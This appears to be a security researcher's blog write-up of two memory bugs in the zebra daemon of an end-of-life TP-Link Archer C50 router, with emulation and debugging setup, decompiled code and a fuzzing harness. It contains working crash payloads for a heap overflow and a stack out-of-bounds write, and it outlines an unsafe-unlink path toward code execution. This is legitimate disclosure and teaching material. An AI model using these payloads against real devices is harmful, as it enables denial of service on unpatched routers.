I want to preface by saying the vendor has been informed of the bugs and chose to take no action as the affected product is EOL. The CVEs are still pending.

I have recently developed an interest for getting my hands on old electronic devices and hacking at them, there is a certain beauty in repurposing an old and otherwise probably useless end-of-life (EOL) device into a fun research project, one man's trash is another man's zero-day as they say... This is nothing new, there are events such as Districtcon's "The Junkyard" which have the same intent, hacking at some EOL devices, though with prizes at stake. However at the time of this writing the submissions for the next Junkyard are unfortunately closed… I've decided to release this with a comprehensive guide on how I have discovered two of my bugs.

The Target

Our target will be a TP-Link Archer-C50 router running on firmware version 0.8.0 0.2 v005c.0 Build 160824 Rel.36561n.

None

I am not going to bother with all the initial recon and research efforts that went into this project as it would be a whole lot of fluff that I deem unnecessary for the purpose of this article, if you want to learn more about IoT/embedded pentesting methodology there are many other resources out there for that already, if that is something you are interested in I highly recommend you check out Matt Brown's youtube channel https://www.youtube.com/@mattbrwn. Instead we will focus on the process we followed to identify our two bugs, namely a heap overflow and a stack out-of-bounds (oob) write affecting the zebra implementation of the router.

But what is zebra you may ask?

None

Zebra is a multi-server routing software which provides TCP/IP based routing protocols. Zebra turns your machine into a full powered router. Some of the features of Zebra include:

  • Common routing protocols such as RIP, OSPF, BGP supported.
  • IPv6 routing protocols such as RIPng and BGP-4+ supported.
  • User can dynamically change configuration from terminal interface.
  • User can use command line completion and history in terminal interface.
  • IP address based filtering, AS path based filtering, attribute modification by route map are supported.

So zebra in itself doesn't expose itself to the network but interacts with other processes which do.

It's also worth noting Zebra as it was on our router is uncommon nowadays. It has been decommissioned a long time ago, it was forked into Quagga and Quagga itself has also been decommissioned after being forked to FRRouting where Zebra remains as a core utility.

Setting up for analysis

The Zebra server executable is a MIPS32 Big-Endian executable dynamically linked to uClibc as its standard C library. Its main method of external interaction is by a unix socket served usually under /var/tmp/.zserv.

Our analysis for now will consist of static and dynamic analysis techniques. Our static analysis will be through Ghidra, I will not detail how to load the binary in Ghidra here. Dynamic analysis is done by emulating and debugging the binary, our setup is described in the rest of this section.

To emulate the binary we will use qemu-mips-static, setting the system root at the firmware's root and let the process hang until a debugger is attached to a gdb server running on port 1337.

squashfs-root/usr/bin/qemu-mips-static -g 1337 -L squashfs-root squashfs-root/usr/sbin/zebra

The above should create the unix socket under /var/tmp/.zserv, the server should now be ready to receive and process data.

To connect to the gdb server we will write a simple gdb initialization script to avoid reconfiguring our debug environment every time we need to restart gdb.

# init.gdb
set architecture mips
set endian big

# Load the binary
file /home/goober/TP-Link_Archer_C50/firmware/_Archer_C50v2_0.8.0_0.2_up_boot\(160824\)_2016-08-24_10.11.00.bin.extracted/squashfs-root/usr/sbin/zebra

# Set sysroot to find libraries
set sysroot /home/goober/TP-Link_Archer_C50/firmware/_Archer_C50v2_0.8.0_0.2_up_boot\(160824\)_2016-08-24_10.11.00.bin.extracted/squashfs-root

# Connect to remote
target remote :1337

# Disable pagination
set pagination off

# Debug info
info target
info registers

We can simply connect to the gdb server with this command:

gdb-multiarch -x init.gdb

Now that we are able to emulate and debug the zebra server we need a way to interface with it. The below script can send and receive bytes to/from the zebra server's unix socket, this will be the template we will build upon for furthering our dynamic analysis.

import socket
import os

socket_path = '/var/tmp/.zserv'

# Create a Unix socket
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)

try:
    # Connect to the socket
    sock.connect(socket_path)
    print(f"Connected to {socket_path}")

    # Send data (example)
    message = b"DONGLES AND PRIMITIVES\n"
    sock.sendall(message)

    # Receive response
    response = sock.recv(4096)
    print(f"Received: {response}")

except socket.error as e:
    print(f"Socket error: {e}")
except ConnectionRefusedError:
    print("Connection refused - is the service running?")
finally:
    sock.close()

Understanding the zebra server

There have been some popular vulnerabilities where the payload is delivered by unix socket in the past such as Docker Socket Escape (CVE-2019–5736) or Polkit (CVE-2021–4034 "PwnKit"), most often they are avenues for a local user to do privilege escalation. In embedded devices however, unix sockets are generally not the most appealing entry point for an exploit, unlike other sockets like TCP and UDP they often don't directly expose a way for an outside user to interface with it. This means that in order to exploit the zebra bugs we would inherently need either an exploitation primitive/attack chain which enables us to write to the socket or a way to have our payloads go through another routing related daemon which interfaces with zebra such as ripd, while the first option is unlikely we will further discuss the second possibility in a later section.

Now that we understand how to interface with the executable we can proceed with taint analysis by first finding a source which in this case is whatever reads from the unix socket and sinks which is whatever uses the data fed to the source.

Our source in this case is the function at 0x40ac10 which calls read. Read's first arg is the file descriptor which in this case is the file descriptor corresponding to the unix socket, the second argument is the destination buffer and the third argument is the amount of bytes which can be read into the buffer.


int FUN_0040ac10(int param_1,void *param_2,size_t param_3)

{
  ssize_t sVar1;
  size_t __nbytes;
  
  __nbytes = param_3;
  if (0 < (int)param_3) {
    do {
      sVar1 = read(param_1,param_2,__nbytes);
      if (sVar1 < 0) {
        return sVar1;
      }
      if (sVar1 == 0) break;
      __nbytes = __nbytes - sVar1;
      param_2 = (void *)((int)param_2 + sVar1);
    } while (0 < (int)__nbytes);
  }
  return param_3 - __nbytes;
}

If we follow the flow of the destination buffer's subsequent uses and confirm with gdb we will find it is processed by a few functions until it reaches the function at 0x402f3c where its pointer is stored at the offset +0x14 of param1, this pointer is stored by the iVar4 variable, values at offsets of iVar4 are read for uVar2 (the first two bytes of our input) and cVar3 (The third byte of our input). Now notice the switchcase in this function it uses, it determines the control flow of the program based on our input, this is common in server software, we have a jumptable which performs different actions based on the client-provided data. This is a great find as it gives us clearer avenues to explore for potentially interesting sinks in the different available program features.


undefined4 UndefinedFunction_00402f3c(int param_1)

{
  int iVar1;
  uint uVar2;
  char cVar3;
  int iVar4;
  undefined4 uVar5;
  
  iVar4 = *(int *)(param_1 + 0x14);
  uVar5 = *(undefined4 *)(param_1 + 0x18);
  *(undefined4 *)(iVar4 + 0xc) = 0;
  iVar1 = FUN_0040a908(*(undefined4 *)(iVar4 + 4),uVar5,3);
  if (0 < iVar1) {
    uVar2 = FUN_0040a438(*(undefined4 *)(iVar4 + 4));
    cVar3 = FUN_0040a400(*(undefined4 *)(iVar4 + 4));
    if ((2 < uVar2) &&
       ((uVar2 = uVar2 - 3 & 0xffff, uVar2 == 0 ||
        (iVar1 = FUN_0040a908(*(undefined4 *)(iVar4 + 4),uVar5,uVar2), 0 < iVar1)))) {
      switch(cVar3 + -1) {
      case '\0':
        FUN_00402764(iVar4,uVar2);
        break;
      case '\x01':
        *(undefined1 *)(iVar4 + 0x22) = 0;
        break;
      case '\x06':
        FUN_00402850(iVar4,uVar2);
        break;
      case '\a':
        FUN_00402a34(iVar4,uVar2);
        break;
      case '\n':
        FUN_00406344(0xb,iVar4,uVar2);
        break;
      case '\v':
        FUN_004063b0(0xc,iVar4,uVar2);
        break;
      case '\f':
        FUN_004063f0(0xd,iVar4,uVar2);
        break;
      case '\r':
        FUN_00406400(0xe,iVar4,uVar2);
        break;
      case '\x0e':
        FUN_00402c0c(iVar4,uVar2);
      }
      FUN_0040aad8(*(undefined4 *)(iVar4 + 4));
      FUN_00402d14(1,uVar5,iVar4);
      return 0;
    }
  }
  FUN_00402c44(iVar4);
  return 0xffffffff;
}

Before the switchcase can be reached though there are 2 checks that are performed, the first check for iVar1 being greater than 0 which I have not had issues with personally so it can be ignored. The second check is critical, we need uVar2 to be greater than 2 AND pass one of two checks. I have opted to solve the simpler first check which passes if uVar2 -3 & 0xFFFF equals 0. The only value satisfying this constraint is 3, as uVar2 is the first two bytes of our input this means we should start our input with the bytes \x00\x03 to reach further code paths.

We can adjust our script accordingly.

import socket
import os

# Socket path
socket_path = '/var/tmp/.zserv'

# Create a Unix socket
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)

try:
    # Connect to the socket
    sock.connect(socket_path)
    
    # Payload
    head = b"\x00\x03" # uVar2
    cmd = b"\x01" # uVar3
    data = b"\x41"*100
    payload= head+cmd+data
    
    # Deliver payload
    sock.sendall(payload)

    # Receive response
    response = sock.recv(4096)
    print(f"Received: {response}")

except socket.error as e:
    print(f"Socket error: {e}")
except ConnectionRefusedError:
    print("Connection refused - is the service running?")
finally:
    sock.close()

We can confirm by running this script and taking a peek at gdb that we are able to get past the constraint predicating our jump table of interest.

Finding a heap overflow

Great, now we have a general idea of how our user input is first processed by the zebra server! The next thing we could do is look through the different commands available to us and see which one seems to lead to the most promising sink, that could be something like a memcpy statement or some other buffer write operation which we may have some control over. For our first bug this was not necessary, we found our first bug by accident when sending as data 10000 chained "%s" character sequences to the server which made it segfault, like what sometimes finding bugs is simpler than we might think, once you get the core functionality of a program it can open doors to many different "not so deep" bugs that would've hardly been found otherwise. Now the challenge is understanding the bug.

We will find that at the end of the jump table function if no valid command was selected there will be a call to FUN_00402c44 which parses value from our user-controlled buffer, if the bytes at the start of our buffer are not null then FUN_40a330 will be called with the user-controlled buffer, finally in FUN_40a330 the pointer at param_1+4 (our controlled buffer) is freed by a wrapper of free FUN_0040990c, the sigsegv later happens in free's code.

┌─────────────────────────────────────────────────────────────────┐
│                   Heap overflow control flow                    │
└─────────────────────────────────────────────────────────────────┘

User Input: "%s%s%s%s..." (10000 chained)
    │
    ▼
┌───────────────────────────────────────────────────────────────┐
│ Jump Table Function                                           │
│ • Checks for valid command                                    │
│ • No match found (invalid command)                            │
└───────────────────────┬───────────────────────────────────────┘
                        │
                        ▼
┌───────────────────────────────────────────────────────────────┐
│ FUN_00402c44(user_buffer)                                     │
│ • Parses value from user-controlled buffer                    │
│ • Checks if buffer[0] != NULL                                 │
└───────────────────────┬───────────────────────────────────────┘
                        │ buffer[0] != NULL
                        ▼
┌───────────────────────────────────────────────────────────────┐
│ FUN_0040a330(user_buffer)                                     │
│ • Accesses param_1 + 4 (user-controlled pointer)              │
│ • Calls free wrapper: FUN_0040990c(param_1 + 4)               │
└───────────────────────┬───────────────────────────────────────┘
                        │
                        ▼
┌───────────────────────────────────────────────────────────────┐
│ FUN_0040990c() → free()                                       │
│ • Attempts to free corrupted pointer                          │
│ • SIGSEGV! Crash in free's internals                          │
└───────────────────────────────────────────────────────────────┘

free's purpose is to deallocate heap chunks this means our bug is most likely heap related, and likely falls under the bug category of a heap overflow, use-after-free or double-free.

Our analysis tells us the following. - Double free: Breakpointing on free at the start of execution shows free is only executed once, targeting our user-controlled buffer, which in term causes a sigsegv, realloc is never called either. This means this bug is almost certainly not a double-free. - UAF: If it were a UAF we would probably not get a corruption at free but another func after the chunk is freed.

This leaves us with a heap overflow as our best explanation, what probably is happening is that our input is stored on the heap where it overflows into another adjacent heap chunk's metadata, causing a sigsegv to happen when said corrupt chunk is freed.

We can confirm the data we are storing when the read call is performed is stored in a heap chunk which has size metadata of 0x1000. Looking for memory allocation function calls in our program we will find an allocation of 0x1000 bytes done once by the calloc wrapper function at 0x40a2e0 not long after the program is initialized.

void FUN_004030f8(undefined4 param_1)
...
  uVar2 = FUN_0040a2e0(0x1000);

Sidenote because I thought this was really intriguing, as you may know calloc is similar to malloc but allows you to allocate multiple heap chunks of the same size at once rather than a single chunk, so why didn't they just use malloc instead of calling calloc once..?

Comparing the address and metadata returned by calloc to that of the read's destination buffer will show they are the same. And that the buffer's size is never readjusted.

We can see when free is called that the chunk it receives as an argument has some data from our user input (recall we injected %s character sequences which translate to \x25\x73 in hexadecimal) at its start where the metadata would begin, this makes sense because the preceding chunk is the one responsible for holding our input data, confirming we have corrupted an adjacent chunk's metadata by heap overflow.

0x41f968: 0x25732573 0x25730021 0x00000000 0x0041f990 0x41f978: 0x00000000 0x00000000 0x00000000 0x00001000 0x41f988: 0x00000000 0x00001009 0x00000000 0x00000000

Heap overflow: Honing in the source cause

Now that we know our bug is a heap overflow, the chunk's origin, the source and the input data triggering it we can more accurately determine HOW the input data triggers the heap overflow.

Looking back at our read call in our debugger we'll notice there is not one but three consecutive read calls for our input data, the first read call ALWAYS reads the first 3 bytes of our user input, that being the header and command. The function we have presented as the read wrapper has the particularity of defining the amount of bytes which would be read for the next read call by the current n_size value minus the last amount of bytes read, the second read call's sole purpose is to define the read size of the third call, in this case 0x2573 minus the previous size making it 0x2570. Finally as you might have already figure the third call will read up to 0x2570 bytes into our 0x1000 bytes buffer causing a heap overflow.

In conclusion the flaw of this implementation is that the read size is controlled by client data in a fixed-size buffer on the heap. This corresponds to the below payload in our python script where the final read size is adjusted to a very elite 0x1337 after it is processed.

<SNIP>
    head = b"\x00\x03"
    cmd = b"\x05"
    size = b"\x13\x3A"
    padding = b"A"*4100
    payload= head+cmd+size+padding
    sock.sendall(payload)
<SNIP>

A brief look at exploitability

For the purpose of this article we will not write any exploits (beyond a simple DOS), however we will briefly explore the possibility of this first bug to be exploited in the device's context for arbitrary code execution.

The exploitation of this binary should not be too convoluted as it has no binary protections (NX, PIE, etc…) and relies on a relatively old uClibc version. uClibc itself is know to have a simpler heap implementation than binaries compiled with libc. As we can overwrite a chunk's metadata and free it we have the primitives we need for an unsafe unlink attack which could enable arbitrary code execution.

That being said, this bug is not exploitable in the device's context, the only daemon communicating with zebra here is ripd which itself will never send packets larger than 200 bytes to the zebra daemon. This is a little disappointing but now that we know this we can leverage this information to find more impactful bugs as demonstrated in the next section.

Finding another bug with our foot in the door

At this point we have already figured how to reach the different possible code paths in the jumptable but we have only found a bug by sending a big blob of data, there are still many more possibilities to explore here. We could again take the time to find more sinks where our data could trigger a bug but at this point I felt a little lazy and mostly ready to move on from this project. Still though I didn't want to give up just yet and see if I could find another bug which may be more likely to be exploitable in this device's context. So I decided instead to use our known constraints and write a fuzzing harness accordingly to find additional bugs in zebra.

To fuzz we will simply pipe Radamsa outputs to the listening unix socket. Radamsa is a simple blackbox fuzzing tool which generates outputs that are more likely to find bugs by mutating a given input. "more likely to find bugs" might seem a little vague but it means it's going to be often more efficient at fuzzing than simply piping random data, it is smarter about what is worth and not worth trying in its seed mutations. Below is our fuzzing harness which can be ran by passing the PID of the running server as an argument, this is to monitor whether or not the zebra server is still running.

#!/bin/bash

TARGET_SOCKET="/var/tmp/.zserv"
SEED_DIR="seeds"
CRASH_DIR="./crashes"
TARGET_PID=$1

if [ -z "$TARGET_PID" ]; then
    echo "Usage: $0 <pid>"
    exit 1
fi

if ! kill -0 "$TARGET_PID" 2>/dev/null; then
    echo "Error: Process $TARGET_PID is not running"
    exit 1
fi

if [ ! -d "$SEED_DIR" ]; then
    echo "Error: Seed directory $SEED_DIR not found"
    exit 1
fi

mkdir -p "$CRASH_DIR"

COUNTER=0
RADAMSA_SEED=$$

while kill -0 "$TARGET_PID" 2>/dev/null; do
    ((COUNTER++))
    CURRENT_SEED=$((RADAMSA_SEED + COUNTER))

    INPUT_FILE="$CRASH_DIR/input_${COUNTER}_rseed_${CURRENT_SEED}.bin"
    ../radamsa/bin/radamsa -n 1 -s $CURRENT_SEED -r "$SEED_DIR" | head -c 512 > "$INPUT_FILE"

    cat "$INPUT_FILE" | socat -u - UNIX-CONNECT:$TARGET_SOCKET 2>/dev/null

    if [ $COUNTER -gt 10 ]; then
        rm -f "$CRASH_DIR/input_$((COUNTER - 10))_rseed_"*.bin
    fi

    [ $((COUNTER % 10)) -eq 0 ] && echo "Sent $COUNTER inputs (rseed: $CURRENT_SEED)"

    sleep 0.01
done

CRASH_SEED=$((RADAMSA_SEED + COUNTER))
echo ""
echo "=== CRASH DETECTED ==="
echo "Process $TARGET_PID crashed after $COUNTER inputs"
echo "Radamsa seed: $CRASH_SEED"
echo "Last input: $INPUT_FILE"
echo ""
echo "Reproduce:"
echo "  ../radamsa/bin/radamsa -T 512 -n 1 -s $CRASH_SEED -r $SEED_DIR > crash.bin"
echo "  cat crash.bin | socat -u - UNIX-CONNECT:$TARGET_SOCKET"

Our seed corpus consists of seeds preconstrained with the following criterias:

  • Must start with the \x00\x03 header
  • Must set its third byte to one matching an available jump table command
  • Must be no longer than 200 bytes

This should generate seeds which will not overlap with our past bug while staying in a realistic size range for data received by ripd.

After running the fuzzer for a few hours we found seed 202783 to generate a crash.

└─$ cat input_202783_rseed_216808.hex
01030801ffffffffffffffffffffffffffffffffffffffffffffffffffff
ffff00000306000000000306000000000306000000000306000000000306
000000000306000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000001700000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
0000

Looking at the crash we will find that it ends when an invalid memory address is dereferenced, this time though this involves data on the stack.

Stack oob write: Honing in the source cause

We'll keep this bug's explanation short and simple, FUN_00402a34 is called in this scenario, then within it is called FUN_00405254, after FUN_00405254 executes, multiple values are moved from offsets of the stack to registers, notably s0 is set to the value at sp+64, this value is subsequently dereferenced at the instruction below which will fail for our seed as it is dereferencing a pointer from our seed's contents (0xffffffff) lw a0,0x4 (s0)

undefined4
FUN_00405254(int param_1,undefined4 param_2,undefined4 param_3,undefined4 param_4,int param_5)

{
  int iVar1;
  undefined4 uVar2;
  int *piVar3;
  int iVar4;
  int *piVar5;
  
  iVar1 = FUN_00403f64(1);
  uVar2 = 0;
  if (iVar1 != 0) {
    FUN_00407e08(param_3);
    iVar1 = FUN_00409c60(iVar1,param_3);
    uVar2 = 0xfffffffc;
    if (iVar1 != 0) {
      piVar3 = (int *)0x0;
      for (piVar5 = *(int **)(iVar1 + 0x24); piVar5 != (int *)0x0; piVar5 = (int *)*piVar5) {
        if ((*(byte *)((int)piVar5 + 0x11) & 0x10) != 0) {
          piVar3 = piVar5;
        }
        if (piVar5[2] == 2) {
          iVar4 = piVar5[9];
          if ((((param_1 == 2) && (iVar4 != 0)) && (*(char *)(iVar4 + 8) == '\x01')) &&
             (*(int *)(iVar4 + 0xc) == param_5)) {
            if (piVar5[7] == 0) goto LAB_004053f4;
            piVar5[7] = piVar5[7] + -1;
            goto LAB_00405370;
          }
        }
        else if (piVar5[2] == param_1) {
LAB_004053f4:
          FUN_00404e94(iVar1,piVar5);
          goto LAB_00405358;
        }
      }
      if ((piVar3 == (int *)0x0) || (param_1 != 1)) {
        FUN_0040a080(iVar1);
        uVar2 = 0xfffffffc;
      }
      else {
        for (piVar5 = *(int **)((int)piVar3 + 0x24); piVar5 != (int *)0x0; piVar5 = (int *)*piVar5 )
        {
          *(byte *)((int)piVar5 + 9) = *(byte *)((int)piVar5 + 9) & 0xfd;
        }
        piVar5 = (int *)0x0;
        *(byte *)((int)piVar3 + 0x11) = *(byte *)((int)piVar3 + 0x11) & 0xef;
LAB_00405358:
        FUN_00404c14(iVar1,piVar5);
        if (piVar5 != (int *)0x0) {
          FUN_00404a74(piVar5);
LAB_00405370:
          FUN_0040a080(iVar1);
        }
        FUN_0040a080(iVar1);
        uVar2 = 0;
      }
    }
  }
  return uVar2;
}

The unexpected pointer in this area can be explain by a previous memcpy call where the size field is read from user-controlled data. memcpy's size argument is defined in FUN_0040a3b8 arguments as "iVar4 + 7U >> 3", iVar4 (v0) is read as 0xff at the offset 6 of our user-controlled buffer which results in an unexpected size of 0x20.

void FUN_0040a3b8(void *param_1,int param_2,size_t param_3)

{
  memcpy(param_1,(void *)(*(int *)(param_2 + 4) + *(int *)(param_2 + 0xc)),param_3);
  *(size_t *)(param_2 + 0xc) = *(int *)(param_2 + 0xc) + param_3;
  return;
}

The highest possible value for the size is 0x20, this is not enough to overflow the return address but may serve as a useful primitive depending on what data can be written at the arbitrary address, exploitability has not been further explored however.

Conclusion

This small research project demonstrates embedded device server-related daemons can yield interesting vulnerabilities when approached systematically.

We discovered:

  • A heap overflow (size-controlled read) not exploitable due to ripd constraints
  • A stack OOB write limited but potentially useful as a primitive

Key insights:

  • Understanding the full attack surface (ripd size limits) is critical
  • Constrained fuzzing is more effective than blind fuzzing
  • Legacy code often has "low-hanging fruit" bugs which vendors are unwilling to patch

Stay tuned to this blog for more low-level shenanigans! Next you can expect something moreso exploitation or symbolic execution related, all in an ethical context as always ;).